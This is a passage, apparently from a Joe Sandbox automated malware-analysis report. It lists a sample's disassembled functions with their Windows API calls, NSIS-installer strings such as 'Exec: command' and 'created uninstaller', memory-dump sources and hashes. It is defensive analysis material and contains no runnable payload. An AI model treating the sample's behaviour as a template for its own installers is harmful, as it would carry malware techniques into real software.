                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                                                            Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                                            • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                                            • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                                                            Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                                            • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                                            • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                                                            Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425D19,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                                            • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                                            • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                                            • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                                                            • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                                                            • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                                                            Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                                                            Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425D19,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                                            • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                                            • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                                            • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                                                            Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                                            • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                                            • String ID: f
                                                                                                                                                                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                                            • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                                                            Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00070600,00000064,0014A47A), ref: 00403295
                                                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                                            • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                                                            Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                                            • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
